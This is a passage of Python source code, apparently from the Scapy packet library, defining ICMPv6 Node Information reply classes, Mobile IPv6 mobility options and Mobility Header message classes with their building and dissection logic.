        """Convert a user value to the internal ``(qtype, value)`` pair.

        A tuple is read as an explicit ``(qtype, value)`` hint; otherwise
        the qtype comes from *pkt* (0 when there is no packet).
        """
        qtype = 0  # We will decode it as string if not
        # overridden through 'qtype' in pkt

        # No user hint, let's use 'qtype' value for that purpose
        if not isinstance(x, tuple):
            if pkt is not None:
                qtype = pkt.qtype
        else:
            qtype = x[0]
            x = x[1]

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [val.encode() if isinstance(val, str) else val
                     for val in x]
            # A leading integer is the TTL; it defaults to 0.
            if x and isinstance(x[0], six.integer_types):
                ttl = x[0]
                names = x[1:]
            else:
                ttl = 0
                names = x
            return (2, [ttl, names2dnsrepr(names)])

        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if six.PY3 and isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of *val* to *s*."""
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        elif t == 3:
            return s + b"".join(
                struct.pack("!I", ttl) + inet_pton(socket.AF_INET6, addr)
                for ttl, addr in tmp)
        elif t == 4:
            return s + b"".join(
                struct.pack("!I", ttl) + inet_pton(socket.AF_INET, addr)
                for ttl, addr in tmp)
        else:
            return s + tmp

    def getfield(self, pkt, s):
        """Dissect the data according to the packet's code and qtype."""
        code = getattr(pkt, "code")
        if code != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        elif qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        elif qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                res.append((ttl, ip))
                s = s[20:]
            return s, (3, res)

        elif qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                res.append((ttl, ip))
                s = s[8:]
            return s, (4, res)
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        if x is None:
            return "[]"

        if isinstance(x, tuple) and len(x) == 2:
            t, val = x
            if t == 2:  # DNS names
                ttl, encoded = val
                # dnsrepr2names() yields bytes; convert them before
                # joining with a str separator.
                names = [plain_str(n) for n in dnsrepr2names(encoded)]
                return "ttl:%d %s" % (ttl, ", ".join(names))
            elif t == 3 or t == 4:
                return "[ %s ]" % (", ".join(
                    "(%d, %s)" % (ttl, addr) for ttl, addr in val))
            return repr(val)
        return repr(x)  # XXX should not happen
|
|
# By default, sent responses have code set to 0 (successful)
|
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    """Node Information Reply (ICMPv6 type 140) with qtype 0 and code 0."""
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [
        ByteEnumField("type", 140, icmp6types),
        ByteEnumField("code", 0, _nireply_code),
        XShortField("cksum", None),
        ShortEnumField("qtype", 0, icmp6_niqtypes),
        BitField("unused", 0, 10),
        FlagsField("flags", 0, 6, "TACLSG"),
        NonceField("nonce", None),
        NIReplyDataField("data", None),
    ]
|
|
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 2 (node names)."""
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
|
|
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 3 (IPv6 addresses)."""
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
|
|
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    """Node Information Reply with qtype 4 (IPv4 addresses)."""
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
|
|
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    """Node Information Reply with code 1 (responder refuses to answer)."""
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
|
|
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    """Node Information Reply with code 2 (qtype unknown to the responder)."""
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
|
|
|
def _niquery_guesser(p):
    """Pick the Node Information class matching the raw message *p*.

    The first byte is the ICMPv6 type (139 query, 140 reply). Queries are
    dispatched on the qtype at bytes 4-5; replies on the code at byte 1
    and, for code 0, on the qtype. conf.raw_layer is returned when
    nothing matches.
    """
    fallback = conf.raw_layer
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) <= 6:
            return fallback
        qtype, = struct.unpack("!H", p[4:6])
        queries = {0: ICMPv6NIQueryNOOP,
                   2: ICMPv6NIQueryName,
                   3: ICMPv6NIQueryIPv6,
                   4: ICMPv6NIQueryIPv4}
        return queries.get(qtype, conf.raw_layer)

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 0:
            if len(p) <= 6:
                return fallback
            qtype, = struct.unpack("!H", p[4:6])
            replies = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}
            return replies.get(qtype, ICMPv6NIReplyNOOP)
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown

    return fallback
|
|
|
#############################################################################
|
#############################################################################
|
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
|
#############################################################################
|
#############################################################################
|
|
# Mobile IPv6 ICMPv6 related classes
|
|
class ICMPv6HAADRequest(_ICMPv6):
    """Home Agent Address Discovery Request (ICMPv6 type 144)."""
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [
        ByteEnumField("type", 144, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("R", 1, 1, {1: 'MR'}),
        XBitField("res", 0, 15),
    ]

    def hashret(self):
        """Hash made of the 16-bit id followed by the payload's hash."""
        ident = struct.pack("!H", self.id)
        return ident + self.payload.hashret()
|
|
class ICMPv6HAADReply(_ICMPv6):
    """Home Agent Address Discovery Reply (ICMPv6 type 145)."""
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [
        ByteEnumField("type", 145, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("R", 1, 1, {1: 'MR'}),
        XBitField("res", 0, 15),
        IP6ListField('addresses', None),
    ]

    def hashret(self):
        """Hash made of the 16-bit id followed by the payload's hash."""
        ident = struct.pack("!H", self.id)
        return ident + self.payload.hashret()

    def answers(self, other):
        """Match a HAAD request carrying the same id."""
        if isinstance(other, ICMPv6HAADRequest):
            return self.id == other.id
        return 0
|
|
class ICMPv6MPSol(_ICMPv6):
    """Mobile Prefix Solicitation (ICMPv6 type 146)."""
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [
        ByteEnumField("type", 146, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        XShortField("res", 0),
    ]

    def hashret(self):
        """Hash on the 16-bit id, like ICMPv6MPAdv.hashret().

        The method used to be defined only as ``_hashret``, so the
        solicitation did not hash on its id the way the advertisement
        does. An unset id is hashed as 0.
        """
        ident = 0 if self.id is None else self.id
        return struct.pack("!H", ident)

    # Former (misspelled) name, kept for backward compatibility.
    _hashret = hashret
|
|
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """Mobile Prefix Advertisement (ICMPv6 type 147)."""
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [
        ByteEnumField("type", 147, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XShortField("id", None),
        BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
        XBitField("res", 0, 14),
    ]

    def hashret(self):
        """Hash on the 16-bit id."""
        ident = self.id
        return struct.pack("!H", ident)

    def answers(self, other):
        """Return True when *other* is a Mobile Prefix Solicitation."""
        return isinstance(other, ICMPv6MPSol)
|
|
# Mobile IPv6 Options classes
|
|
|
_mobopttypes = { 2: "Binding Refresh Advice",
|
3: "Alternate Care-of Address",
|
4: "Nonce Indices",
|
5: "Binding Authorization Data",
|
6: "Mobile Network Prefix (RFC3963)",
|
7: "Link-Layer Address (RFC4068)",
|
8: "Mobile Node Identifier (RFC4283)",
|
9: "Mobility Message Authentication (RFC4285)",
|
10: "Replay Protection (RFC4285)",
|
11: "CGA Parameters Request (RFC4866)",
|
12: "CGA Parameters (RFC4866)",
|
13: "Signature (RFC4866)",
|
14: "Home Keygen Token (RFC4866)",
|
15: "Care-of Test Init (RFC4866)",
|
16: "Care-of Test (RFC4866)" }
|
|
|
class _MIP6OptAlign:
|
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
|
This class is inherited by all MIPv6 options to help in computing the
|
required Padding for that option, i.e. the need for a Pad1 or PadN
|
option before it. They only need to provide x and y as class
|
parameters. (x=0 and y=0 are used when no alignment is required)"""
|
def alignment_delta(self, curpos):
|
x = self.x ; y = self.y
|
if x == 0 and y ==0:
|
return 0
|
delta = x*((curpos - y + x - 1)//x) + y - curpos
|
return delta
|
|
|
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
    """Binding Refresh Advice mobility option (type 2)."""
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [
        ByteEnumField('otype', 2, _mobopttypes),
        ByteField('olen', 2),
        ShortField('rinter', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0
|
|
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
    """Alternate Care-of Address mobility option (type 3)."""
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [
        ByteEnumField('otype', 3, _mobopttypes),
        ByteField('olen', 16),
        IP6Field("acoa", "::"),
    ]
    # alignment requirement: 8n+6
    x = 8
    y = 6
|
|
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
    """Nonce Indices mobility option (type 4)."""
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [
        ByteEnumField('otype', 4, _mobopttypes),
        # The option data is two 16-bit indices, i.e. 4 bytes; the
        # previous default of 16 did not match the fields that follow.
        ByteField('olen', 4),
        ShortField('hni', 0),
        ShortField('coni', 0),
    ]
    # alignment requirement: 2n
    x = 2
    y = 0
|
|
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
    """Binding Authorization Data mobility option (type 5)."""
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [
        ByteEnumField('otype', 5, _mobopttypes),
        # The authenticator below is 96 bits, i.e. 12 bytes; the
        # previous default of 16 did not match it.
        ByteField('olen', 12),
        BitField('authenticator', 0, 96),
    ]
    # alignment requirement: 8n+2
    x = 8
    y = 2
|
|
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet):  # NEMO - RFC 3963
    """Mobile Network Prefix option (type 6)."""
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        ByteField("olen", 18),
        ByteField("reserved", 0),
        ByteField("plen", 64),
        IP6Field("prefix", "::"),
    ]
    # alignment requirement: 8n+4
    x = 8
    y = 4
|
|
class MIP6OptLLAddr(_MIP6OptAlign, Packet):  # Sect 6.4.4 of RFC 4068
    """Link-Layer Address mobility option (type 7)."""
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [
        ByteEnumField("otype", 7, _mobopttypes),
        ByteField("olen", 7),
        ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
        ByteField("pad", 0),
        MACField("lla", ETHER_ANY),  # Only support ethernet
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptMNID(_MIP6OptAlign, Packet):  # RFC 4283
    """Mobile Node Identifier option (type 8).

    ``olen`` is the length of ``id`` plus one (for the subtype byte).
    """
    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [
        ByteEnumField("otype", 8, _mobopttypes),
        FieldLenField("olen", None, length_of="id", fmt="B",
                      adjust=lambda pkt, x: x + 1),
        ByteEnumField("subtype", 1, {1: "NAI"}),
        StrLenField("id", "",
                    length_from=lambda pkt: pkt.olen - 1),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
# We only support decoding and basic build. Automatic HMAC computation is
|
# too much work for our current needs. It is left to the user (I mean ...
|
# you). --arno
|
class MIP6OptMsgAuth(_MIP6OptAlign, Packet):  # RFC 4285 (Sect. 5)
    """Mobility Message Authentication option (type 9).

    ``olen`` is the length of ``authdata`` plus five (subtype and SPI).
    """
    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        FieldLenField("olen", None, length_of="authdata", fmt="B",
                      adjust=lambda pkt, x: x + 5),
        ByteEnumField("subtype", 1,
                      {1: "MN-HA authentication mobility option",
                       2: "MN-AAA authentication mobility option"}),
        IntField("mspi", None),
        StrLenField("authdata", "A" * 12,
                    length_from=lambda pkt: pkt.olen - 5),
    ]
    # alignment requirement: 4n+1
    x = 4
    y = 1
|
|
# Extracted from RFC 1305 (NTP) :
|
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
|
# in seconds relative to 0h on 1 January 1900. The integer part is in the
|
# first 32 bits and the fraction part in the last 32 bits.
|
class NTPTimestampField(LongField):
    """64-bit NTP timestamp: seconds since 1900 in the upper 32 bits and
    the fraction of a second in the lower 32 bits."""

    def i2repr(self, pkt, x):
        """Return the timestamp as a UTC date followed by the raw value.

        Values falling in the first 50 years after 1900 are not converted
        and are reported with a generic message.
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the
        # Unix epoch (1970-01-01 00:00:00 UTC): 25567 days * 86400.
        # The previous constant (2209075761) was off by about one day.
        delta = -2208988800
        seconds = int(x >> 32)
        fraction = float(x & 0xffffffff) * 2.0**-32
        res = seconds + fraction + delta
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))

        return "%s (%d)" % (t, x)
|
|
class MIP6OptReplayProtection(_MIP6OptAlign, Packet):  # RFC 4285 (Sect. 6)
    """Replay Protection option (type 10) carrying an NTP timestamp."""
    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),
        NTPTimestampField("timestamp", 0),
    ]
    # alignment requirement: 8n+2
    x = 8
    y = 2
|
|
class MIP6OptCGAParamsReq(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.6)
    """CGA Parameters Request option (type 11), without any data."""
    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
# XXX TODO: deal with CGA param fragmentation and build of defragmented
|
# XXX version. Passing of a big CGAParam structure should be
|
# XXX simplified. Make it hold packets, by the way --arno
|
class MIP6OptCGAParams(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.1)
    """CGA Parameters option (type 12); ``olen`` is the data length."""
    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptSignature(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.2)
    """Signature option (type 13); ``olen`` is the signature length."""
    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptHomeKeygenToken(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.3)
    """Home Keygen Token option (type 14); ``olen`` is the token length."""
    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptCareOfTestInit(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.4)
    """Care-of Test Init option (type 15), without any data."""
    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptCareOfTest(_MIP6OptAlign, Packet):  # RFC 4866 (Sect. 5.5)
    """Care-of Test option (type 16); ``olen`` is the token length."""
    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8,
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
class MIP6OptUnknown(_MIP6OptAlign, Packet):
    """Generic type/length/data container for mobility options."""
    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # alignment requirement: none
    x = 0
    y = 0
|
|
# Mobility option type number -> class used to dissect that option
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}
|
|
|
# Main Mobile IPv6 Classes
|
|
# Mobility Header type numbers and their short names
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
    5: 'BU',
    6: 'BA',
    7: 'BE',
    8: 'Fast BU',
    9: 'Fast BA',
    10: 'Fast NA',
}
|
|
# From http://www.iana.org/assignments/mobility-parameters
|
# Binding Acknowledgement status codes and their descriptions
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
    128: 'Reason unspecified',
    129: 'Administratively prohibited',
    130: 'Insufficient resources',
    131: 'Home registration not supported',
    132: 'Not home subnet',
    133: 'Not home agent for this mobile node',
    134: 'Duplicate Address Detection failed',
    135: 'Sequence number out of window',
    136: 'Expired home nonce index',
    137: 'Expired care-of nonce index',
    138: 'Expired nonces',
    139: 'Registration type change disallowed',
    140: 'Mobile Router Operation not permitted',
    141: 'Invalid Prefix',
    142: 'Not Authorized for Prefix',
    143: 'Forwarding Setup failed (prefixes missing)',
    144: 'MIPV6-ID-MISMATCH',
    145: 'MIPV6-MESG-ID-REQD',
    146: 'MIPV6-AUTH-FAIL',
    147: 'Permanent home keygen token unavailable',
    148: 'CGA and signature verification failed',
    149: 'Permanent home keygen token exists',
    150: 'Non-null home nonce index expected',
}
|
|
|
class _MobilityHeader(Packet):
    """Base class of the Mobility Header messages.

    It fills in the header length and the checksum at build time when
    they were left to None.
    """
    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Patch the length (byte 1) and checksum (bytes 4-5) into *p*.

        :param p: the built header, as bytes
        :param pay: the built payload, appended to the header first
        :return: header plus payload with both fields filled in
        """
        p += pay
        hdr_len = self.len
        if hdr_len is None:
            # Length is counted in 8-byte units, first 8 bytes excluded.
            hdr_len = (len(p) - 8) // 8
        # Plain slices replace the former chb() calls, which were applied
        # to multi-byte slices although chb() is a single-byte helper.
        p = p[:1] + struct.pack("B", hdr_len) + p[2:]
        if self.cksum is None:
            cksum = in6_chksum(135, self.underlayer, p)
        else:
            cksum = self.cksum
        p = p[:4] + struct.pack("!H", cksum) + p[6:]
        return p
|
|
|
class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Mobility Header with an opaque message body of 8*len - 6 bytes."""
    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", None, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrLenField("msg", b"\x00" * 2,
                    length_from=lambda pkt: 8 * pkt.len - 6),
    ]
|
|
|
|
# TODO: make a generic _OptionsField
|
class _MobilityOptionsField(PacketListField):
    """List of mobility options with automatic alignment padding.

    ``curpos`` is the offset at which the options start in the enclosing
    header; it is the starting point of the alignment computations.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)

    def getfield(self, pkt, s):
        """Dissect the first length_from(pkt) bytes of *s* as options."""
        l = self.length_from(pkt)
        return s[l:], self.m2i(pkt, s[:l])

    def i2len(self, pkt, i):
        """Return the length of the built options, padding included."""
        return len(self.i2m(pkt, i))

    def m2i(self, pkt, x):
        """Dissect *x* into a list of option packets.

        The class is picked from moboptcls using the option type byte;
        self.cls is used for unknown types and when dissection fails.
        """
        opt = []
        while x:
            o = orb(x[0])  # Option type
            cls = self.cls
            if o in moboptcls:
                cls = moboptcls[o]
            try:
                op = cls(x)
            except Exception:
                # Fall back to the generic option on malformed data.
                op = self.cls(x)
            opt.append(op)
            if isinstance(op.payload, conf.raw_layer):
                # What the option did not consume holds the next options.
                x = op.payload.load
                del(op.payload)
            else:
                x = b""
        return opt

    @staticmethod
    def _padding(delta):
        """Return the padding option(s) filling *delta* bytes."""
        if delta == 1:
            return raw(Pad1())
        if delta != 0:
            return raw(PadN(optdata=b'\x00' * (delta - 2)))
        return b""

    def i2m(self, pkt, x):
        """Build the options, inserting padding unless autopad is off."""
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            # raw() is needed here: joining str() results into bytes
            # raises a TypeError on Python 3.
            return b"".join(map(raw, x))

        curpos = self.curpos
        s = b""
        for p in x:
            d = p.alignment_delta(curpos)
            curpos += d
            s += self._padding(d)
            pstr = raw(p)
            curpos += len(pstr)
            s += pstr

        # Let's make the class including our option field
        # a multiple of 8 octets long
        d = curpos % 8
        if d == 0:
            return s
        return s + self._padding(8 - d)

    def addfield(self, pkt, s, val):
        """Append the built options to *s*."""
        return s + self.i2m(pkt, val)
|
|
class MIP6MH_BRR(_MobilityHeader):
    """Binding Refresh Request (mhtype 0)."""
    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _MobilityOptionsField("options", [], MIP6OptUnknown, 8,
                              length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA."""
        # Hack: BRR, BU and BA all return the same constant value
        # b"\x00\x08\x09", because BA must be matched with BU and BU
        # with BRR. --arno
        return b"\x00\x08\x09"
|
|
class MIP6MH_HoTI(_MobilityHeader):
    """Home Test Init (mhtype 1)."""
    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _MobilityOptionsField("options", [], MIP6OptUnknown, 16,
                              length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Hash on the cookie."""
        cookie = self.cookie
        return raw(cookie)
|
|
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Care-of Test Init: same layout as Home Test Init, mhtype 2."""
    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Hash on the cookie."""
        cookie = self.cookie
        return raw(cookie)
|
|
class MIP6MH_HoT(_MobilityHeader):
    """Home Test (mhtype 3)."""
    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _MobilityOptionsField("options", [], MIP6OptUnknown, 24,
                              length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Hash on the cookie."""
        cookie = self.cookie
        return raw(cookie)

    def answers(self, other):
        """Return 1 for a Home Test Init carrying the same cookie, else 0."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        if self.cookie == other.cookie:
            return 1
        return 0
|
|
class MIP6MH_CoT(MIP6MH_HoT):
    """Care-of Test: same layout as Home Test, mhtype 4."""
    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Hash on the cookie."""
        cookie = self.cookie
        return raw(cookie)

    def answers(self, other):
        """Return 1 for a Care-of Test Init carrying the same cookie, else 0."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        if self.cookie == other.cookie:
            return 1
        return 0
|
|
class LifetimeField(ShortField):
    """Short field holding a lifetime counted in units of 4 seconds."""

    def i2repr(self, pkt, x):
        """Display the value converted to seconds."""
        seconds = 4 * x
        return "%d sec" % seconds
|
|
class MIP6MH_BU(_MobilityHeader):
    """Binding Update (mhtype 5)."""
    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _MobilityOptionsField("options", [], MIP6OptUnknown, 12,
                              length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared with BRR and BA."""
        # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 when *other* is a Binding Refresh Request, else 0."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0
|
|
class MIP6MH_BA(_MobilityHeader):
    """Binding Acknowledgement message (MH type 6)."""

    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 6, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ByteEnumField("status", 0, bastatus),
        FlagsField("flags", "K", 3, "PRK"),
        XBitField("res2", None, 5),
        # TODO: ShortNonceField
        XShortField("seq", None),
        # unit == 4 seconds
        XShortField("mhtime", 0),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _MobilityOptionsField("options", [], MIP6OptUnknown, 12,
                              length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return a constant hash key."""
        # Hack: see comment in MIP6MH_BRR.hashret()
        return b"\x00\x08\x09"

    def answers(self, other):
        """
        Return 1 if other is a MIP6MH_BU (mhtype 5) that has bit 0x1 of its
        flags set and carries the same sequence number as this message
        (mhtype 6); return 0 otherwise.
        """
        if not isinstance(other, MIP6MH_BU):
            return 0
        if other.mhtype != 5 or self.mhtype != 6:
            return 0
        if not other.flags & 0x1:  # Ack request flag is not set
            return 0
        return 1 if self.seq == other.seq else 0
|
|
# Names of the Binding Error status codes (used by MIP6MH_BE.status)
_bestatus = {
    1: 'Unknown binding for Home Address destination option',
    2: 'Unrecognized MH Type value',
}
|
|
# TODO: match Binding Error to its stimulus
|
class MIP6MH_BE(_MobilityHeader):
    """Binding Error message (MH type 7)."""

